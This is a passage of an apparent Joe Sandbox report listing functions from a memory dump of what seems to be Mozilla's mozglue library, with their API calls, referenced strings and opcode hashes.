?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C6EDCA0,?,?,?,6C6AE8B5,00000000), ref: 6C6D5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C6AE8B5,00000000), ref: 6C6D5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C6AE8B5,00000000), ref: 6C6D5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C6AE8B5,00000000), ref: 6C6D5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C6AE8B5,00000000), ref: 6C6D5FD6

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 248dab52f3ce79d5edb69c5f384b161088dae463a6d0421adc7d8c3a0d03e332
Instruction ID: b24280515603a1d321ef0cc6b9888e61cf14aecafad2c7070a6af63dea900239
Opcode Fuzzy Hash: 248dab52f3ce79d5edb69c5f384b161088dae463a6d0421adc7d8c3a0d03e332
Instruction Fuzzy Hash: E0310A743006008FD710CF29C898A6AB7F6FF89319F654558E5668BB95C731EC41CF95

Function 6C67B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C67B532
moz_xmalloc.MOZGLUE(?), ref: 6C67B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C67B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C67B57E
free.MOZGLUE(00000000), ref: 6C67B58F

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: ce0d6b5070d816cc6e80a1f032b05b30dab1e1924fd1c49e1c553e31739db2b7
Instruction ID: ca28b8b1675c212be558220117f7de1aca2cebee3c3b2696999ce9e4e8322277
Opcode Fuzzy Hash: ce0d6b5070d816cc6e80a1f032b05b30dab1e1924fd1c49e1c553e31739db2b7
Instruction Fuzzy Hash: B8210771A002059BEB108F69CC80BAABBB9FF86314F284529E918DB341E736D911C7B5

Function 6C6D6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C6D6E78

Part of subcall function 6C6D6A10: InitializeCriticalSection.KERNEL32(6C6FF618), ref: 6C6D6A68
Part of subcall function 6C6D6A10: GetCurrentProcess.KERNEL32 ref: 6C6D6A7D
Part of subcall function 6C6D6A10: GetCurrentProcess.KERNEL32 ref: 6C6D6AA1
Part of subcall function 6C6D6A10: EnterCriticalSection.KERNEL32(6C6FF618), ref: 6C6D6AAE
Part of subcall function 6C6D6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6D6AE1
Part of subcall function 6C6D6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6D6B15
Part of subcall function 6C6D6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C6D6B65
Part of subcall function 6C6D6A10: LeaveCriticalSection.KERNEL32(6C6FF618,?,?), ref: 6C6D6B83

MozFormatCodeAddress.MOZGLUE ref: 6C6D6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6D6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6D6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C6D6EFF

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: e9b1bc6eaad4115e78bd506b67cce5cdfe7e18f49e13df88e747d581eebf1d08
Instruction ID: e93521370a207d8680322bff48f90434592b547c0219b4bbd4a234680227aa7a
Opcode Fuzzy Hash: e9b1bc6eaad4115e78bd506b67cce5cdfe7e18f49e13df88e747d581eebf1d08
Instruction Fuzzy Hash: 5921C471A0421A9FDB00CF69E8C469E77F5EF84308F044439E80997240EB34AA59CF96

Function 6C6B0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C673DEF), ref: 6C6B0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C673DEF), ref: 6C6B0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C673DEF), ref: 6C6B0DAF

Strings

<jemalloc>, xrefs: 6C6B0D92, 6C6B0DB9
: (malloc) Error in VirtualFree(), xrefs: 6C6B0D97, 6C6B0DBE

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 18ef300a787ac60527e94d57bd96e10736540c78704e2b211e0c14a6645224c0
Instruction ID: 16a7935057ed6efd78885f4954fde02d1b71d82d60877ecd59ec1b67465b3192
Opcode Fuzzy Hash: 18ef300a787ac60527e94d57bd96e10736540c78704e2b211e0c14a6645224c0
Instruction Fuzzy Hash: 38F080B138139823E61015665F06B962E9F67C2B55F344035F225FADC0DA70E411876D

Function 6C6C7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6C75C4,?), ref: 6C6C762B

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6C74D7,6C6D15FC,?,?,?), ref: 6C6C7644
GetCurrentThreadId.KERNEL32 ref: 6C6C765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6C74D7,6C6D15FC,?,?,?), ref: 6C6C7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6C74D7,6C6D15FC,?,?,?), ref: 6C6C7677

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 36d5a3fb8c2097bde95a751680f05c9f1edaa61a9987e1e5df28aaa67318ee07
Instruction ID: 4df69ce4929cedec1eb1eef81ea9ff4ee05ae0e1236127bdf6e9128d799fcf40
Opcode Fuzzy Hash: 36d5a3fb8c2097bde95a751680f05c9f1edaa61a9987e1e5df28aaa67318ee07
Instruction Fuzzy Hash: 93F02271E10346ABD3008F22D888676B779FFEB398F124316F90543601E7B0A5D18BD0

Function 6C69D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA

EnterCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D4F2
LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D50B

Part of subcall function 6C67CFE0: EnterCriticalSection.KERNEL32(6C6FE784), ref: 6C67CFF6
Part of subcall function 6C67CFE0: LeaveCriticalSection.KERNEL32(6C6FE784), ref: 6C67D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D52E
EnterCriticalSection.KERNEL32(6C6FE7DC), ref: 6C69D690
LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D751

Strings

MOZ_CRASH(), xrefs: 6C69D4BB

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: c9aede8dd9eda3211db7316de22d9e9311b2ee067b46ee3700ff65acc3d77de1
Instruction ID: d93ad2189e70c190fd9f8374d2d6f141bb0ba1a1ec863a5c1d42d8edd0aecb4d
Opcode Fuzzy Hash: c9aede8dd9eda3211db7316de22d9e9311b2ee067b46ee3700ff65acc3d77de1
Instruction Fuzzy Hash: 2051E371A047068FD714CF29C0D065ABBF2EB8A704F14493ED5AAC7B84D771E801CB5A

Function 6C6C4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6C4721

Strings

profiler-paused, xrefs: 6C6C46E4
., xrefs: 6C6C476A
-%llu, xrefs: 6C6C4733

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 6879b1c216723495a24d5b6db295c3c1cd47d8b05aa73c73b164f36a3ee775c1
Instruction ID: 705f362ddc85373c2067a52dd95ba4b4dbfbc3e3a9cb21864de0bf9e58659312
Opcode Fuzzy Hash: 6879b1c216723495a24d5b6db295c3c1cd47d8b05aa73c73b164f36a3ee775c1
Instruction Fuzzy Hash: 4B417A71F087089BCB08DF79E88116EBBF5EF86344F10863EE8555B741EB709814875A

Function 6C6C46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6C4721

Part of subcall function 6C674410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C6B3EBD,00000017,?,00000000,?,6C6B3EBD,?,?,6C6742D2), ref: 6C674444

Strings

profiler-paused, xrefs: 6C6C46E4
., xrefs: 6C6C476A
-%llu, xrefs: 6C6C4733

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 9d5a63fc5fcbe58ebb96588cc7697a7eea04b4b3072639f17b91664a4417b556
Instruction ID: 3d8d84ac75673cf557cc2b04c5c4967f059ca955709abc0f5b56e294b8f6dcc4
Opcode Fuzzy Hash: 9d5a63fc5fcbe58ebb96588cc7697a7eea04b4b3072639f17b91664a4417b556
Instruction Fuzzy Hash: BF314B71F042085BCB0CDF6DE8812BDBBE6DB89314F14453EE8159B741EBB09C048BA9

Function 6C6CB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C674290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C6B3EBD,6C6B3EBD,00000000), ref: 6C6742A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6CB127), ref: 6C6CB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C6CB4E4

Strings

pid:, xrefs: 6C6CB4DE

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 38bb152147dd68db6649754623ece22ac30c8b39985866d1befb1dad53ee70b1
Instruction ID: a9d4d016f9d7fcbd9bfc97b9a82707e7e0e73c05ca050ef4f63845b5527cf403
Opcode Fuzzy Hash: 38bb152147dd68db6649754623ece22ac30c8b39985866d1befb1dad53ee70b1
Instruction Fuzzy Hash: ED314631B05208DFDB10DFA9D880AEEB7B6FF85318F540529D81167A40D736E849CBEA

Function 6C6BE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6BE577
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BE584
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6BE8A6

Strings

MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C6BE655
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C6BE777
MOZ_PROFILER_STARTUP, xrefs: 6C6BE5A1, 6C6BE5CC, 6C6BE5FF, 6C6BE62A
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6BE826, 6C6BE850
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C6BE722, 6C6BE750, 6C6BE7A2

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: d6dbcc130141c7d376fb0ae0d48b5b96379e70b2bd4610d86a80969e8373bba6
Instruction ID: 42704a496c8ea43da358345b296f30f332c531bdcbb8709589e90615ed27120d
Opcode Fuzzy Hash: d6dbcc130141c7d376fb0ae0d48b5b96379e70b2bd4610d86a80969e8373bba6
Instruction Fuzzy Hash: 4F118E31604258DFCB009F16D488A6DBBF6FFC9368F010619E9A557B51D770A806CBDE

Function 6C6C0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6C0CD5

Part of subcall function 6C6AF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6AF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6C0D40
free.MOZGLUE ref: 6C6C0DCB

Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2

free.MOZGLUE ref: 6C6C0DDD
free.MOZGLUE ref: 6C6C0DF2

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 3e8ef359588e455776f22b8bf18f03a709bc24580ad7f9581dd4078ef239ad1f
Instruction ID: db3c9609cf6f976d40109ee3fa011ee490782173101638c9b4ea98c14056416a
Opcode Fuzzy Hash: 3e8ef359588e455776f22b8bf18f03a709bc24580ad7f9581dd4078ef239ad1f
Instruction Fuzzy Hash: E641F8B1A097849BD720CF29C04079AFBE5FF89714F108A1EE8D887750D770A445CB8B

Function 6C6CCCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CCDA4

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

Part of subcall function 6C6CD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C6CCDBA,00100000,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CD158
Part of subcall function 6C6CD130: InitializeConditionVariable.KERNEL32(00000098,?,6C6CCDBA,00100000,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CCDC4

Part of subcall function 6C6C7480: ReleaseSRWLockExclusive.KERNEL32(?,6C6D15FC,?,?,?,?,6C6D15FC,?), ref: 6C6C74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CCECC

Part of subcall function 6C68CA10: mozalloc_abort.MOZGLUE(?), ref: 6C68CAA2

Part of subcall function 6C6BCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C6CCEEA,?,?,?,?,00000000,?,6C6BDA31,00100000,?,?,00000000), ref: 6C6BCB57
Part of subcall function 6C6BCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C6BCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C6CCEEA,?,?), ref: 6C6BCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CD058

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: db99decde1bcb8c9dfb1f950e2e03afb2f5333ea3e7e33e6f7efcb1957ffb5db
Instruction ID: a4a1ce886107fc406c61f186249fffc2e02a9a3df3d2090e7bf87fc5b1f586dd
Opcode Fuzzy Hash: db99decde1bcb8c9dfb1f950e2e03afb2f5333ea3e7e33e6f7efcb1957ffb5db
Instruction Fuzzy Hash: 31D16E71B04B069FD708CF28C480B99B7E1FF89308F01866DD95987752EB31E9A5CB86

Function 6C695C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C695D40
EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C695D67
__aulldiv.LIBCMT ref: 6C695DB4
LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C695DED

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: ef450bc33486c48436a0b2bcd86668b00c8d6d620e6ee6fc16cdf7471c273174
Instruction ID: 931ab2c822d611f44716c70d2a6836c0e209e105fa3fd3b4a35b5cbcc532b2fe
Opcode Fuzzy Hash: ef450bc33486c48436a0b2bcd86668b00c8d6d620e6ee6fc16cdf7471c273174
Instruction Fuzzy Hash: 25517171E041268FCF08CF69C894AAEBBF2FF85304F19461DD821A7750DB316945CB99

Function 6C67CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C67CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C67CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C67CF4E

Strings

0, xrefs: 6C67CF30

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 607c25052b4d1c7c634e32c2e7f96a4b65083280217957f742742b263af47f13
Instruction ID: 334c46d3cd2635d127a7dc825588b86cab3c83f62a185a41aab3df19961c7edb
Opcode Fuzzy Hash: 607c25052b4d1c7c634e32c2e7f96a4b65083280217957f742742b263af47f13
Instruction Fuzzy Hash: D8512371A042168FCB10CF18C490AAABBB5FF99300F19859DD85A5F351D331ED06CBE0

Function 6C6B6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6B82BC,?,?), ref: 6C6B649B

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B64A9

Part of subcall function 6C6AFA80: GetCurrentThreadId.KERNEL32 ref: 6C6AFA8D
Part of subcall function 6C6AFA80: AcquireSRWLockExclusive.KERNEL32(6C6FF448), ref: 6C6AFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B653F
free.MOZGLUE(?), ref: 6C6B655A

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

